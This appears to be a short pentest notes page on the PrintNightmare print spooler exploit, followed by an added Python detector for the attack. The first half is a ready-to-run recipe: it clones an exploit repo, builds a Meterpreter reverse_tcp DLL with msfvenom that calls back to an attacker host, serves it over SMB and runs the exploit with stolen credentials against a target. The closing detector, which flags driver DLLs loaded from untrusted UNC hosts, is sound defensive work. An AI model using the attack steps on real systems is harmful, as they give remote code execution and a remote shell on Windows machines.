# Print Nightmare
* Clone [cube0x0's exploits](https://github.com/cube0x0/CVE-2021-1675.git)
* Create virtual env inside cloned repo and install impacket
```sh
pip install .
pip2 install .
```
* Create payload
```sh
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -f dll -o giftcard.dll
```
* Prepare msf multi handler
* Inside virtualenv
```sh
smbserver share $(pwd) -smb2support
```
* Roll the exploit
```sh
python CVE-2021-1675.py GROUP/username:'password'@$TARGET_IP '\\$ATTACKER_IP\share\giftcard.dll'
```
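
A defender-side check for the last step above, as an added example that is not part of the original page or of cube0x0's repository: the exploit is handed a DLL by UNC path, so a printer-driver file that resolves to a remote host outside your known print servers is worth an alert. The event records, their field names and the `trusted_servers` list are constructed assumptions; map them onto whatever spooler or EDR telemetry you actually collect.

```python
import re

# Spellings that all resolve to a UNC target: \\host\..., \\?\UNC\host\...,
# \??\UNC\host\...  (\\?\C:\... and \\.\... are local device paths, not UNC).
_UNC_PREFIX = re.compile(r'^(?:\\\\\?\\UNC\\|\\\?\?\\UNC\\|\\\\)(?![?.]\\)', re.I)

def unc_host(path):
    """Return the lower-cased remote host of a UNC path, or None if local."""
    p = path.strip().strip('"').replace("/", "\\")
    m = _UNC_PREFIX.match(p)
    if not m:
        return None
    return p[m.end():].split("\\", 1)[0].lower() or None

def flag_remote_driver_files(events, trusted_servers=()):
    """List (time, user, host, file) for driver files on untrusted remote hosts."""
    trusted = {s.lower() for s in trusted_servers}
    hits = []
    for ev in events:
        for f in ev["files"]:
            host = unc_host(f)
            if host and host not in trusted:
                hits.append((ev["time"], ev["user"], host, f))
    return hits

# Constructed sample records (hypothetical schema), one per driver-add event.
SAMPLE_EVENTS = [
    {"time": "2021-07-02T10:01:11Z", "user": "CORP\\alice",
     "files": [r"C:\Windows\System32\spool\drivers\x64\3\unidrv.dll"]},
    {"time": "2021-07-02T10:05:40Z", "user": "CORP\\bob",
     "files": [r"\\printsrv01\print$\x64\3\example.dll"]},
    {"time": "2021-07-02T10:09:02Z", "user": "CORP\\carol",
     "files": [r"C:\Windows\System32\kernelbase.dll",
               r"\\203.0.113.7\share\example.dll"]},
    {"time": "2021-07-02T10:09:30Z", "user": "CORP\\carol",
     "files": [r"\??\UNC\203.0.113.7\share\example.dll"]},
    {"time": "2021-07-02T10:12:00Z", "user": "CORP\\dave",
     "files": [r"\\?\C:\Drivers\local.dll"]},
]

if __name__ == "__main__":
    for hit in flag_remote_driver_files(SAMPLE_EVENTS, ["printsrv01"]):
        print("ALERT", *hit)
```
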